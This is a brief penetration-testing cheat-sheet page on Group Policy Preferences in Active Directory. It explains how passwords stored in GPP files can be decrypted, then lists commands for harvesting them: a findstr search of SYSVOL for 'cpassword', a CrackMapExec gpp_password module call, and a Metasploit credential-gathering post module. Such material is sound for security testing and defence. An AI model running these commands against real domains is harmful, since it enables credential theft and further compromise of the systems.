Group Policy Preferences

Group Policy Preferences provide a powerful tool for administrators to customize and manage settings, however they can also introduce security risks if not properly configured. For example, GPPs can include passwords or other sensitive information, such as the local administrator password, which can be easily decrypted by attackers. If these passwords are used across multiple systems, attackers can gain access to sensitive data or compromise other systems. Additionally, if GPPs are not properly secured, attackers can modify or delete them, leading to unauthorized access or changes to system configurations. Therefore, it is essential for administrators to carefully configure and secure GPPs, including using strong encryption and limiting access to only authorized users, to minimize the potential security risks.

Retreiving Group Policy Preferences

In order to access group policy preferences, you must have either valid domain credentials or a session on a domain joined computer.

# Searching for passwords
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

# CrackMapExec
crackmapexec smb $dc -u $user -p $password -M gpp_password

# Metasploit (POST)
use post/windows/gather/credentials/gpp
set session $i
exploit

References

Last updated